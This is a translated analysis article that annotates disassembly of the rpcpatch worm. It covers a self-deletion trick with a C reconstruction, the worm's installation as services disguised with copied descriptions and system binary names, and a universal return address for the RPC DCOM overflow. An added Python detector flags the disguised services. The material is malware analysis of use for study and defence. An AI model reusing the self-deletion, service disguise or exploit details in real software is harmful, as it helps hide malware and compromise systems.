Rpcpatch worm code comments

Source: Internet
Author: User

Setting aside the ethical problems of writing worms, it has to be admitted that whoever wrote this program is a sophisticated Windows programmer: the code style is good, the program is well written, and many parts of it are worth learning from. The techniques it uses also show how well the author understands Windows. As a program, it is still instructive.

1. The self-deletion function

First, let's look at how the worm deletes its own file. A Windows application cannot simply delete itself, because while it is running the system maps the executable into memory through the memory-mapped files mechanism, so the space the file occupies stays in use. The simplest workaround is to create a batch file that deletes the main program and then deletes the batch file itself, or to call "cmd /c del" directly from the program (Jeffrey Richter describes this mechanism in the "Win32 Q&A" column of MSDN, January 1996: Http://www.microsoft.com/msj/archive/SF9C.aspx). This worm uses another, cleverer method, one proposed by Gary Nebbett.

; Call from 004012ce
:00402970 55                  push ebp
:00402971 8bec                mov ebp, esp
:00402973 81ec10020000        sub esp, 00000210
:00402979 56                  push esi
:0040297a 8b35a8404000        mov esi, dword ptr [004040a8]      ; esi = kernel32.GetModuleFileNameA
:00402980 8d85f4feffff        lea eax, dword ptr [ebp+fffffef4]
:00402986 6804010000          push 00000104
:0040298b 50                  push eax
:0040298c 6a00                push 00000000
:0040298e ffd6                call esi                           ; kernel32.GetModuleFileNameA
:00402990 8d8df4feffff        lea ecx, dword ptr [ebp+fffffef4]
:00402996 51                  push ecx
:00402997 ff1574404000        call dword ptr [00404074]          ; kernel32.GetFileAttributesA
:0040299d a801                test al, 01                        ; is the read-only attribute set on the file?
:0040299f 7410                je 004029b1                        ; if not, go straight to deleting the file
:004029a1 24fe                and al, fe                         ; if so, clear the read-only attribute
:004029a3 8d95f4feffff        lea edx, dword ptr [ebp+fffffef4]
:004029a9 50                  push eax
:004029aa 52                  push edx
:004029ab ff1578404000        call dword ptr [00404078]          ; kernel32.SetFileAttributesA
The following is Gary Nebbett's classic code:
; jmp from 0040299f
:004029b1 6a00                push 00000000                      ; with a NULL argument the system returns the handle of the program itself
:004029b3 ff157c404000        call dword ptr [0040407c]          ; kernel32.GetModuleHandleA
:004029b9 8d8df0fdffff        lea ecx, dword ptr [ebp+fffffdf0]
:004029bf 6804010000          push 00000104
:004029c4 51                  push ecx
:004029c5 50                  push eax
:004029c6 8945fc              mov dword ptr [ebp-04], eax        ; save the module handle (image base)
:004029c9 ffd6                call esi                           ; kernel32!GetModuleFileNameA
:004029cb 6a04                push 00000004                      ; handle 4, the hard-coded handle of the program's own image
:004029cd ff15e0404000        call dword ptr [004040e0]          ; kernel32.CloseHandle
:004029d3 8d85f0fdffff        lea eax, dword ptr [ebp+fffffdf0]
:004029d9 6a00                push 00000000
:004029db 6a00                push 00000000
:004029dd 50                  push eax                           ; the program's own file name
:004029de ff35bc404000        push dword ptr [004040bc]          ; kernel32!ExitProcess
:004029e4 ff75fc              push [ebp-04]                      ; image base, which is 00400000
:004029e7 ff35e8404000        push dword ptr [004040e8]          ; kernel32!DeleteFileA
:004029ed ff3580404000        push dword ptr [00404080]          ; kernel32!UnmapViewOfFile
:004029f3 c3                  ret
In source form the trick looks like this:

#include <windows.h>

/* Gary Nebbett's self-deletion trick, as used by the worm */
int main(int argc, char *argv[])
{
    HMODULE module = GetModuleHandle(0);
    CHAR buf[MAX_PATH];
    GetModuleFileName(module, buf, sizeof buf);
    CloseHandle((HANDLE)4);   /* handle 4: the hard-coded handle of the program's own image */
    __asm {
        lea eax, buf
        push 0                 ; argument for ExitProcess
        push 0                 ; return address after ExitProcess (never reached)
        push eax               ; argument for DeleteFile: the program's own file name
        push ExitProcess       ; DeleteFile "returns" into ExitProcess
        push module            ; argument for UnmapViewOfFile: the image base
        push DeleteFile        ; UnmapViewOfFile "returns" into DeleteFile
        push UnmapViewOfFile
        ret                    ; "returns" into UnmapViewOfFile
    }
    return 0;
}
In words: first close handle 4, the hard-coded handle that refers to the program's own image; then call UnmapViewOfFile on the program's own image; after that the file can be deleted.

But two points should be noted:
1. This code does not work on Windows XP.
2. This code cannot be started from the command line.
Both points deserve a closer look.

2. The service-creation functions

There is nothing special about the code that creates the services. The clever part is that the worm copies the description of an existing service on the system and uses it as its own description. This is more deceptive than inventing a description of its own, because whatever language version of Windows the worm spreads to, the Service Manager shows descriptive text that people are used to seeing, which makes the worm hard to notice.

; InstallTftpService
; Call from 0040137f, 004016d0
:004015e0 81ec08020000        sub esp, 00000208
:004015e6 8d842404010000      lea eax, dword ptr [esp+00000104]
:004015ed 56                  push esi
:004015ee 8b351c414000        mov esi, dword ptr [0040411c]      ; msvcrt.sprintf
:004015f4 6898744000          push 00407498
:004015f9 684c614000          push 0040614c                      ; db '%s/dllcache/tftpd.exe',0
:004015fe 50                  push eax
:004015ff ffd6                call esi
:00401601 83c40c              add esp, 0000000c
:00401604 8d4c2404            lea ecx, dword ptr [esp+04]
:00401608 6898744000          push 00407498
:0040160d 6838614000          push 00406138                      ; db '%s/wins/svchost.exe',0
:00401612 51                  push ecx
:00401613 ffd6                call esi
:00401615 83c40c              add esp, 0000000c
:00401618 8d542404            lea edx, dword ptr [esp+04]
:0040161c 8d842408010000      lea eax, dword ptr [esp+00000108]
:00401623 6a00                push 00000000
:00401625 52                  push edx
:00401626 50                  push eax
:00401627 ff15b4404000        call dword ptr [004040b4]          ; kernel32.CopyFileA
:0040162d 6830614000          push 00406130                      ; db 'msdtc',0 ; the description of the MSDTC service is copied
:00401632 6824614000          push 00406124                      ; db 'svchost.exe'
:00401637 6808614000          push 00406108                      ; db 'network connections sharing'
:0040163c 686c5b4000          push 00405b6c                      ; db 'rpctftpd',0
:00401641 e89a0d0000          call 004023e0                      ; CreateService (the worm's own routine, listed below)
:00401646 83c410              add esp, 00000010
:00401649 5e                  pop esi
:0040164a 81c408020000        add esp, 00000208
:00401650 c3                  ret

; InstallRpcpatchService
; Call from 004016d5
:00401660 81ec0c020000        sub esp, 0000020c
:00401666 8d842404010000      lea eax, dword ptr [esp+00000104]
:0040166d 6804010000          push 00000104
:00401672 50                  push eax
:00401673 6a00                push 00000000
:00401675 ff15a8404000        call dword ptr [004040a8]          ; kernel32.GetModuleFileNameA
:0040167b 6898744000          push 00407498
:00401680 8d4c2404            lea ecx, dword ptr [esp+04]
:00401684 6884614000          push 00406184                      ; db '%s/wins/dllhost.exe',0
:00401689 51                  push ecx
:0040168a ff151c414000        call dword ptr [0040411c]          ; msvcrt.sprintf
:00401690 83c40c              add esp, 0000000c
:00401693 8d542400            lea edx, dword ptr [esp]
:00401697 8d842404010000      lea eax, dword ptr [esp+00000104]
:0040169e 6a00                push 00000000
:004016a0 52                  push edx
:004016a1 50                  push eax
:004016a2 ff15b4404000        call dword ptr [004040b4]          ; kernel32.CopyFileA
:004016a8 687c614000          push 0040617c                      ; db 'browser',0 ; the description of the Browser service is copied
:004016ad 6870614000          push 00406170                      ; db 'dllhost.exe',0
:004016b2 6864614000          push 00406164                      ; db 'WINS client',0
:004016b7 68785b4000          push 00405b78                      ; db 'rpcpatch',0
:004016bc e81f0d0000          call 004023e0                      ; CreateService (the worm's own routine, listed below)
:004016c1 81c41c020000        add esp, 0000021c
:004016c7 c3                  ret

; CreateService
; Call from 00401641, 004016bc
:004023e0 81ec10010000        sub esp, 00000110
:004023e6 53                  push ebx
:004023e7 55                  push ebp
:004023e8 56                  push esi
:004023e9 57                  push edi
:004023ea 683f000f00          push 000f003f                      ; SC_MANAGER_ALL_ACCESS
:004023ef 6a00                push 00000000
:004023f1 6a00                push 00000000
:004023f3 ff152c404000        call dword ptr [0040402c]          ; advapi32.OpenSCManagerA
:004023f9 8be8                mov ebp, eax
:004023fb 85ed                test ebp, ebp
:004023fd 750b                jne 0040240a                       ; the service is created starting at 0040240a; that code is long and is not listed here
:004023ff 5f                  pop edi
:00402400 5e                  pop esi
:00402401 5d                  pop ebp
:00402402 5b                  pop ebx
:00402403 81c410010000        add esp, 00000110
:00402409 c3                  ret
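As an added, defender-side illustration (this is not code from the article or from the worm), the disguise described above leaves a few checkable traces: the two service names, the two borrowed display names, and copies of svchost.exe and dllhost.exe running from a folder other than system32. The Python below applies those checks to a service inventory. The record shape (service name, display name, binary path) and the sample entries are constructed for the example; on a real host the records would be read from the service control manager or the Services registry key.

```python
# Added example, not code from the article or from the worm it analyses.
# Flags service entries that imitate the rpcpatch worm's disguise.
import ntpath

# Service names and display names the article shows the worm registering.
WORM_SERVICE_NAMES = {"rpctftpd", "rpcpatch"}
WORM_DISPLAY_NAMES = {"network connections sharing", "wins client"}

# System binaries the worm copies and runs from a non-standard folder.
# The real ones live directly in %SystemRoot%\system32.
HOSTED_SYSTEM_BINARIES = {"svchost.exe", "dllhost.exe", "tftpd.exe"}

# Folders the article shows the worm dropping its copies into
# (the "wins" and "dllcache" path components of the format strings).
WORM_DROP_FOLDERS = {"wins", "dllcache"}


def _normalise(path):
    """Lower-case a Windows path, strip surrounding quotes, unify separators."""
    return path.strip().strip('"').lower().replace("/", "\\")


def suspicious_reasons(name, display, binary_path):
    """Return the list of reasons a service entry looks like the worm's disguise.
    An empty list means nothing matched."""
    reasons = []
    p = _normalise(binary_path)
    # Cut off any command-line arguments after the executable.
    exe_path = p[:p.index(".exe") + 4] if ".exe" in p else p.split(" ")[0]
    directory, basename = ntpath.split(exe_path)
    parent = directory.rsplit("\\", 1)[-1]

    if name.lower() in WORM_SERVICE_NAMES:
        reasons.append(f"service name {name!r} is one the worm registers")
    if display.strip().lower() in WORM_DISPLAY_NAMES:
        reasons.append(f"display name {display!r} matches a description the worm copies")
    if basename in HOSTED_SYSTEM_BINARIES and parent != "system32":
        reasons.append(f"system binary {basename} runs from {directory!r} instead of system32")
    if parent in WORM_DROP_FOLDERS:
        reasons.append(f"binary lives in {parent!r}, a folder the worm uses as a drop location")
    return reasons


# Constructed sample inventory: (service name, display name, binary path).
SAMPLE_SERVICES = [
    ("Browser", "Computer Browser", "%SystemRoot%\\System32\\svchost.exe -k netsvcs"),
    ("MSDTC", "Distributed Transaction Coordinator", "C:\\WINDOWS\\system32\\msdtc.exe"),
    ("rpcpatch", "WINS Client", "C:\\WINDOWS\\system32\\wins\\DLLHOST.EXE"),
    ("rpctftpd", "Network Connections Sharing", "C:\\WINDOWS\\system32\\wins\\SVCHOST.EXE"),
    ("Spooler", "Print Spooler", "%SystemRoot%\\system32\\spoolsv.exe"),
]


def scan(records):
    """Map each service name that raised at least one reason to its reasons."""
    hits = {}
    for name, display, path in records:
        reasons = suspicious_reasons(name, display, path)
        if reasons:
            hits[name] = reasons
    return hits


if __name__ == "__main__":
    for service, reasons in scan(SAMPLE_SERVICES).items():
        print(service)
        for reason in reasons:
            print("   ", reason)
```

The third check is the one worth keeping even after the worm's own strings are forgotten: a display name and an image name can be copied from a legitimate service, but the copy still has to run from a directory where the real svchost.exe and dllhost.exe do not live.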

3. A universal return address

For the RPC DCOM overflow you do not need the address of a jmp esp instruction as the jump address, because at the moment of the overflow EBX = ESP + 9C and EDI = ESP + F8. So it is enough to prepend the right amount of padding in front of the shellcode and then jump through one of these two registers.

The author of the rpcpatch worm uses 0x0100139d as the jump address to cover both Windows 2000 and XP. This address is in fact the address of a call ebx in svchost.exe under Windows XP, and that is how it works: as the jump address for Windows XP. Judging from the author's article, he believed that this address is a call ebx on both Windows 2000 and Windows XP, but under Windows 2000 the bytes at this address in svchost have no such meaning. Still, if execution is followed step by step, after several hair-raising jumps it arrives at a call edi, and as long as there are enough NOPs in front of the shellcode it also lands in the shellcode. It is just that such a coincidence is extremely rare. Let's follow this thrilling journey:

0100139d 50                  push eax
0100139e 6a08                push 0x8
010013a0 e8cefeffff          call svchost+0x1273 (01001273)
; 01001273 calls on to another routine, which ends up calling ntdll!RtlAllocateHeap and then returns
010013a5 85c0                test eax, eax
010013a7 a324300001          mov [svchost+0x3024 (01003024)], eax
010013ac 741c                jz svchost+0x13ca (010013ca)
010013ae 8b352c300001        mov esi, [svchost+0x302c (0100302c)]
010013b4 8bd8                mov ebx, eax
010013b6 eb0c                jmp svchost+0x13c4 (010013c4)       ; jumps forward
010013b8 8933                mov [ebx], esi
010013ba 56                  push esi
010013bb 83c30c              add ebx, 0xc
010013be ffd7                call edi                            ; <--- after all these steps, this call finally reaches the shellcode
010013c0 8d744602            lea esi, [esi+eax*2+0x2]
010013c4 66833e00            cmp word ptr [esi], 0x0
010013c8 75ee                jnz svchost+0x13b8 (010013b8)       ; back to 010013b8 and the call edi that enters the shellcode

Between 0100139d and 010013be there are 150 instructions in total. None of those conditional jumps may go the wrong way, EDI must not be modified, the shellcode on the stack must not be overwritten... For so many conditions to be satisfied at once, on both Windows 2000 and XP, is remarkable. Since Windows 2000, Microsoft has packaged many services as DLLs and uses svchost.exe to start them; the svchost.exe shell contains no real code of its own, so it was never updated, right up to SP4. That, on the other hand, is what makes this universal address possible.
